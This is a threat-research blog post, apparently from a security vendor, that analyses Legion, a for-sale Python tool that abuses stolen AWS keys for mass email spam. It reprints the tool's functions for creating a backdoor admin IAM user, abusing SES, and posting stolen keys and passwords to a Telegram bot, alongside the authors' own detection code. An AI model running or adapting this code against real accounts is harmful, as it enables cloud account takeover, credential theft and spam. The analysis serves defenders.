Legion: The Latest Threat in Mass Spam Attacks
Summary
As the old proverb says, “Great minds think alike.” Many people may not know or remember the second half of that proverb: “Fools seldom differ.” Both halves of the adage are well represented throughout this article. Researchers (great minds) from Permiso and Cado Security simultaneously stumbled onto a new attack tool, dramatically called Legion, that is focused on mail abuse and SMS spam via services like Amazon SES and Twilio. This tool looks eerily similar (fools seldom differ) to AndroxGh0st, Greenbot, VIOLENT, and a few other for-sale spam attack scripts.
In the spirit of collaboration, Cado and Permiso researchers are tag-teaming a breakdown of Legion’s toolset. Since we (Permiso) have already talked at length about similar variants, the rest of this article will dive into how Legion differs from AndroxGh0st and Greenbot. For a full breakdown of Legion specifically, head over to the Cado Security blog.
Legion Modules
Legion has many different modules for various technologies. In this article we are going to focus on a few of the modules that are specific to AWS. If you would like to ride along, you can find this script on VirusTotal (MD5: ddc6963f98e57090e0a78559c7212498).
Persistence
Our favorite feature in these scripts is the persistence. Legion is mostly using the same playbook as similar tools, with one extra little touch: they add tags to the IAM user they create.
create_new_user
By default, Legion creates a user named ses_legion for persistence. One thing that stands out with Legion compared to other similar tools is that it also adds the tag Owner:ms.boharas to the created user. While it is often hard to understand the motivations of the attacker, we suspect this was added to evade detections that look for users created with no tags associated with them.
def create_new_user(iam_client, user_name='ses_legion'):
    user = None
    try:
        user = iam_client.create_user(
            UserName=user_name,
            Tags=[{'Key': 'Owner', 'Value': 'ms.boharas'}]
        )
    except ClientError as e:
        if e.response['Error']['Code'] == 'EntityAlreadyExists':
            result_str = get_random_string()
            user_name = 'ses_{}'.format(result_str)
            user = iam_client.create_user(UserName=user_name,
                                          Tags=[{'Key': 'Owner', 'Value': 'ms.boharas'}]
                                          )
    return user_name, user
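For defenders, the names and the tag hard-coded above double as indicators. The following is a minimal sketch of a check over a single CloudTrail-style CreateUser record. The function name is ours, and the field names inside requestParameters (userName, tags, key, value) are assumptions about the record layout that should be confirmed against your own logs; the code accepts either tag casing for that reason.

```python
# Indicators taken from the create_new_user function shown above.
LEGION_DEFAULT_USER = "ses_legion"
LEGION_TAG = ("Owner", "ms.boharas")


def legion_create_user_indicators(event):
    """Return the reasons a CreateUser record resembles Legion's behavior."""
    if event.get("eventName") != "CreateUser":
        return []
    params = event.get("requestParameters") or {}
    reasons = []

    user_name = params.get("userName") or ""
    if user_name == LEGION_DEFAULT_USER:
        reasons.append("default Legion user name")
    elif user_name.startswith("ses_"):
        # Fallback name used when ses_legion already exists.
        reasons.append("ses_ prefix used by Legion's fallback name")

    for tag in params.get("tags") or []:
        # Assumed layout: accept both lower-case and capitalized tag fields.
        key = tag.get("key", tag.get("Key"))
        value = tag.get("value", tag.get("Value"))
        if (key, value) == LEGION_TAG:
            reasons.append("Owner:ms.boharas tag")
    return reasons
```

An empty list means no indicator matched. The ses_ prefix alone is a weak signal and is best combined with the tag or with the other activity described later in this article.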
creat_new_group
Legion creates a group with the name SESAdminGroup. Attackers often use generic names like this when creating groups, policies, and users.
def creat_new_group(iam_client, group_name='SESAdminGroup'):
    try:
        res = iam_client.create_group(GroupName=group_name)
    except ClientError as e:
        if e.response['Error']['Code'] == 'EntityAlreadyExists':
            result_str = get_random_string()
            group_name = "SESAdminGroup{}".format(result_str)
            res = iam_client.create_group(GroupName=group_name)
    return res['Group']['GroupName']
creat_new_policy
Legion creates a policy named AdministratorAccess, if one doesn’t already exist, that allows all actions against all resources. This is an attempt to masquerade as the default AdministratorAccess AWS managed policy.
def creat_new_policy(iam_client, policy_name='AdministratorAccess'):
    policy_json = {"Version": "2012-10-17","Statement":
        [{"Effect": "Allow", "Action": "*","Resource": "*"}]}
    try:
        res = iam_client.create_policy(
            PolicyName=policy_name,
            PolicyDocument=json.dumps(policy_json)
        )
    except ClientError as e:
        if e.response['Error']['Code'] == 'EntityAlreadyExists':
            result_str = get_random_string()
            policy_name = "AdministratorAccess{}".format(result_str)
            res = iam_client.create_policy(PolicyName=policy_name,
                                           PolicyDocument=json.dumps(policy_json)
                                           )
    return res['Policy']['Arn']
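The masquerade is easy to spot from the policy ARN, because AWS managed policies carry the literal account field aws while customer-managed policies carry the owning account ID. A minimal sketch of that check follows; the function name is hypothetical and the account ID in the usage note is a placeholder.

```python
def is_masquerading_admin_policy(policy_arn):
    """True if a customer-managed policy borrows the AdministratorAccess name."""
    # ARN layout: arn:partition:service:region:account:resource
    parts = policy_arn.split(":", 5)
    if len(parts) != 6 or parts[2] != "iam":
        return False
    account, resource = parts[4], parts[5]
    if not resource.startswith("policy/"):
        return False
    name = resource.rsplit("/", 1)[-1]
    # The real managed policy is arn:aws:iam::aws:policy/AdministratorAccess.
    # startswith() also catches the randomized fallback name Legion uses.
    return account != "aws" and name.startswith("AdministratorAccess")
```

For example, arn:aws:iam::123456789012:policy/AdministratorAccess is flagged, while arn:aws:iam::aws:policy/AdministratorAccess is not.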
creat_profile
When setting a password for the created user, Legion sets PasswordResetRequired to False, so the new user is not forced to change the password at first sign-in.
def creat_profile(iam_client, user_name, pwd):
    response = iam_client.create_login_profile(
        UserName=user_name, Password=pwd, PasswordResetRequired=False)
    return response
initialize_item
Of note in the initialize_item function, Legion defaults to the us-east-1 region when none is supplied. This is configurable, though.
def initialize_item(item, service='ses'):
    ACCESS_ID = item['id']
    ACCESS_KEY = item['key']
    REGION = item['region']
    if REGION is None:
        REGION = 'us-east-1'
    try:
        return boto3.client(service, region_name=REGION,
                            aws_access_key_id=ACCESS_ID,
                            aws_secret_access_key=ACCESS_KEY
                            )
    except Exception:
        return
make_user
The make_user function pulls this all together:
- Creates a new user with the name ses_legion and the tag Owner:ms.boharas
- Creates a group with the name SESAdminGroup
- Creates a policy called AdministratorAccess that gives full access
- Attaches the policy directly to the ses_legion IAM user
- Sets a password
- Creates a login profile for console access
- Adds the ses_legion IAM user to the group SESAdminGroup
- Logs the result of this activity to a Telegram bot
def make_user(iam_client, item, limit_data):
    try:
        user_name, user_data = create_new_user(iam_client)
        grp_name = creat_new_group(iam_client)
        policy_arn = creat_new_policy(iam_client)
        up = att_usr_policy(iam_client, user_name, policy_arn)
        password = "{}0089#".format(user_name)
        profile = creat_profile(iam_client, user_name, password)
        added_to_grp = att_usr_grp(iam_client, user_name, grp_name)
        if user_data:
            user_arn = user_data['User']['Arn']
            user_id = None
            if user_arn:
                user_id = user_arn.split(':')[4]
            with open('AWS_ByPass/!Users_Cracked.txt', 'a') as tt:
                dd = json.dumps(user_data, indent=4, sort_keys=True, default=default)
                data = ("ACESS_ID={}\nACCESS_KEY={}\nREGION={}\nAmazon IAM User & Pass\n"
                        "Username={}\nPassword={}\nID={}\n")\
                    .format(item['id'], item['key'], item['region'],user_name, password, user_id)
                tt.write(data + "\n")
                tt.write(dd + "\n\n")
                tt.write("Limit for user:\n")
                if limit_data:
                    tt.write(limit_data + "\n")
                tt.write("{}\n".format("*" * 10))
            message = {'text': f"🔥 Legion SMTP 6.5 BOT [AWS Console]\n🏦 Amazon IAM User & Pass\n\nUser: {user_name}\nPass= {password}\nIAM= {user_id}\n\nACESS_ID= {item['id']}\nACCESS_KEY= {item['key']}\nREGION= {item['region']}\nAWS Console Hacked ❤\n"}
            requests.post("https://api.telegram.org/bot" + bot_token +"/sendMessage?chat_id=" + chat_id ,data=message)
            print(f"{yl}[{fc}AWS CHECKER{yl}] {gr}CREATED ID: {fc}{item['id']} {gr}and Access Token/UserID {fc}{user_id}")
    except IOError as e:
        print(f"{yl}[{fc}AWS CHECKER{yl}] {red}Error writing to file for new {fc}USER")
    except ClientError as e:
        print(f"{yl}[{fc}AWS CHECKER{yl}] {red}Failed to create user with ID: {fc}{item['id']}")
    except Exception as e:
        print(f"{yl}[{fc}AWS CHECKER{yl}] {red}Create Failed: {item['id']}")
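Because make_user issues its IAM calls back to back from one access key, the burst itself is a useful behavioral signal, independent of the names chosen. The sketch below flags access keys that issue the whole chain within a short window. It assumes simplified, flattened records with eventName, accessKeyId, and eventTime (a datetime) keys, which is not the raw CloudTrail layout. The five-minute window is an arbitrary illustration, and mapping att_usr_policy and att_usr_grp (not shown in this article) to AttachUserPolicy and AddUserToGroup is inferred from the step list above.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# IAM API calls implied by the make_user steps (a set, so order is ignored).
PERSISTENCE_CHAIN = {
    "CreateUser", "CreateGroup", "CreatePolicy",
    "AttachUserPolicy", "CreateLoginProfile", "AddUserToGroup",
}


def find_persistence_bursts(events, window=timedelta(minutes=5)):
    """Return access key IDs that issued the full chain within `window`."""
    calls_by_key = defaultdict(list)
    for ev in events:
        if ev["eventName"] in PERSISTENCE_CHAIN:
            calls_by_key[ev["accessKeyId"]].append((ev["eventTime"], ev["eventName"]))

    flagged = []
    for key_id, calls in calls_by_key.items():
        calls.sort()
        for i, (start, _) in enumerate(calls):
            # Collect every chain call that falls inside the window from `start`.
            seen = {name for when, name in calls[i:] if when - start <= window}
            if seen == PERSISTENCE_CHAIN:
                flagged.append(key_id)
                break
    return flagged
```

Matching on the sequence rather than on ses_legion or SESAdminGroup keeps the check useful when a variant renames its artifacts.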
Amazon Simple Email Service (SES) Abuse
One of the goals of Legion is to abuse SES in order to send mass spam emails. The modules below are part of this functionality.
check_limit
Legion assesses the email-sending capability of an account by examining the Max24HourSend response element. A Max24HourSend value of 200 signifies that the key and account are in sandbox status, which will not provide a means of abuse. Any value greater than 200 may indicate a potential for attack. If the account is not in sandbox status, Legion can use the SentLast24Hours response element to determine how many messages can still be sent within the 24-hour window by subtracting it from Max24HourSend. However, as a spoiler, it doesn’t appear that Legion’s authors entirely understood the idea of the sandbox, or they didn’t care and preferred to let the script error out until it moves on to the next account.
def check_limit(ses_client, item):
    try:
        l = ses_client.get_send_quota()
        return f"{item['id']}:{item['key']}:{item['region']}:{l['SentLast24Hours']}/{l['Max24HourSend']} Remaining"
    except Exception as e:
        print(f"{yl}[{fc}AWS CHECKER{yl}] {red}Limit Failed: {item['id']}")
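Note that check_limit only formats SentLast24Hours/Max24HourSend and labels it "Remaining"; it never performs the subtraction or the sandbox test described above. For an account owner reviewing their own quota, that logic can be sketched as follows. The function name and return shape are ours, and the 200-message threshold is the one stated in this article; SES documents a Max24HourSend of -1 as an unlimited quota, which the sketch treats separately.

```python
SANDBOX_DAILY_QUOTA = 200  # sandbox value described in the text above


def summarize_quota(quota):
    """Interpret a get_send_quota-style response dictionary."""
    max_send = quota["Max24HourSend"]
    sent = quota["SentLast24Hours"]
    if max_send == -1:
        # -1 signifies an unlimited quota, so nothing meaningful to subtract.
        return {"sandbox": False, "remaining": None}
    return {
        "sandbox": max_send == SANDBOX_DAILY_QUOTA,
        "remaining": max(max_send - sent, 0),
    }
```

A response of {"Max24HourSend": 200.0, "SentLast24Hours": 0.0} is reported as sandboxed with 200 messages remaining.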
check_sending
Somewhat self-explanatory: Legion wants to verify the data and send a message. To do this, it sends an email using the sender and receiver data it has available. A successful call, meaning the email was accepted for delivery, returns a MessageId response element, which Legion checks for before writing the successful details to file.
def check_sending(client, receiver, sender, item, limit_info, iam):
    subj = f"{item['id']}"
    msg = f"*** SMTP DATA ***\n\n"\
          f"{item['id']}:{item['key']}:email-smtp.{item['region']}.amazonaws.com:587\n\n"\
          f"AWS_ID: {item['id']}\nAWS_KEY: "\
          f"{item['key']}\nAWS_REGION: {item['region']}\nFROM: {sender}\n"\
          f"SERVER: email-{item['region']}.amazonaws.com\nPORT: 587 or 25\n\n"\
          f"IAM_USER: {iam}\n\nLimit Info: {limit_info}"
    try:
        return client.send_email(
            Source=sender,
            Destination={'ToAddresses': receiver},
            Message={
                'Subject': {'Data': f'SMTP_KEY: email-smtp.{item["region"]}.amazonaws.com',
                            'Charset': 'UTF-8'},
                'Body': {'Text': {
                    'Data': msg,
                    'Charset': 'UTF-8'
                },
                }
            }
        )
    except Exception as e:
        pass
get_identities, fetch_user, process, begin_check
In the final functions around SES abuse, Legion starts by returning a list of identities via get_identities. fetch_user is called from begin_check to verify the user-creation process; the created user is based on the obtained credentials and is written to a file along with the data from check_limit. Why Legion writes the limit details along with the user is unclear, since the SES send quota applies per account rather than per user. The process function brings many of the previous steps together and is later called by begin_check, both when check_limit returns a result and, with limit=None, when it does not. Although Legion checks that the limit data exists several times leading up to the process call, it does so once more inside the function before running get_identities and looping through the identities, using each one as the sender for check_sending. If check_sending returns a MessageId, Legion considers this a success and writes to the success file !Good_ses_smtp.txt; otherwise it writes to the failed file !BAD_ses_smtp.txt and posts the failure details to its Telegram chat. This is where Legion could have saved time: a sandboxed account will always fail unless it is sending to verified email addresses or domains.
def get_identities(client):
    try:
        return client.list_identities()['Identities']
    except Exception:
        pass

def fetch_user(client):
    try:
        return client.get_user()['User']
    except Exception:
        pass

def process(ses_client, receiver, item, limit=None, iam=None):
    if limit:
        limit = limit.split(':')[3]
    idt = get_identities(ses_client)
    res = None
    if idt:
        for fr in idt:
            res = check_sending(ses_client, receiver, fr, item, limit, iam)
            if res:
                with open('AWS_ByPass/!Good_ses_smtp.txt', 'a') as lr:
                    sm = f"{item['id']}:{item['key']}:email-{item['region']}-1.amazonaws.com:{fr}:587:{limit}\n"
                    lr.write(sm)
                    print(f"{yl}[{fc}AWS CHECKER{yl}] {gr}SENDING SUCCESSFUL: {yl}{item['id']} : {gr}{limit}")
                break
    if not res:
        with open('AWS_ByPass/!BAD_ses_smtp.txt', 'a') as lr:
            sm = f"{item['id']}:{item['key']}:{item['region']}\n"
            message = {'text': f"🔥 Legion SMTP 6.5 BOT [AWS STATUS]\n🏦 KEY= {item['id']}\nSECRET= {item['key']}\nREGION= {item['region']}\nSTATUS=> Sending Paused ⛔\n"}
            requests.post("https://api.telegram.org/bot" + bot_token +"/sendMessage?chat_id=" + chat_id ,data=message)
            lr.write(sm)
            print(f"{yl}[{fc}AWS CHECKER{yl}] {red}Sending Failed: {yl}{sm}")

def begin_check(d, to=emailnow):
    item = {}
    limit = None
    data = d.split(':')
    total = len(data)
    bcode = 'TEVHSU9OIDYuNg=='
    receiver = [to, base64.b64decode(bcode).decode('utf-8')]
    iam_user = None
    if total >= 3:
        if data[2]:
            item['id'] = data[0]
            item['key'] = data[1]
            item['region'] = data[2]
            ses_client = initialize_item(item)
            if ses_client:
                limit = check_limit(ses_client, item)
                iam_client = initialize_item(item, service='iam')
                if iam_client:
                    mu = make_user(iam_client, item, limit)
                    iam = fetch_user(iam_client)
                if limit:
                    remain = limit.split(':')[3]
                    print(f"{yl}[{fc}AWS CHECKER{yl}] {fc}Limit for {item['id']}: {remain}")
                    process(ses_client, receiver, item, limit=limit, iam=None)
                else:
                    print(f"{yl}[{fc}AWS CHECKER{yl}] {red}Failed limit check: {item['id']}")
                    process(ses_client, receiver, item, limit=None, iam=None)
    else:
        print(f"[!] Skipped: {d}")
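The second entry in the receiver list built by begin_check is stored base64-encoded. Decoding it is a quick way to see what the script passes to SES alongside the operator-supplied address. The helper name below is ours; the constant is copied verbatim from the function above.

```python
import base64

# Constant copied verbatim from begin_check.
BCODE = "TEVHSU9OIDYuNg=="


def decode_receiver(bcode):
    """Decode the base64 string the same way begin_check does."""
    return base64.b64decode(bcode).decode("utf-8")


decoded = decode_receiver(BCODE)
print(decoded)  # LEGION 6.6
```

The decoded value reads as a version banner rather than an email address, so it appears that only the to argument supplies a real recipient.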
Conclusion
Mail and SMS abuse are big business for attackers. We have come across close to a dozen variants of similar scripts that are regularly sold for nefarious purposes. Legion is not the first, nor will it be the last. Luckily, given how similar these toolsets are, the methodology-based detections we put in place and described in /blog/s/approach-to-detection-androxgh0st-greenbot-persistence are resilient enough to detect all the variants we have discovered so far being used against any of our clients here at Permiso.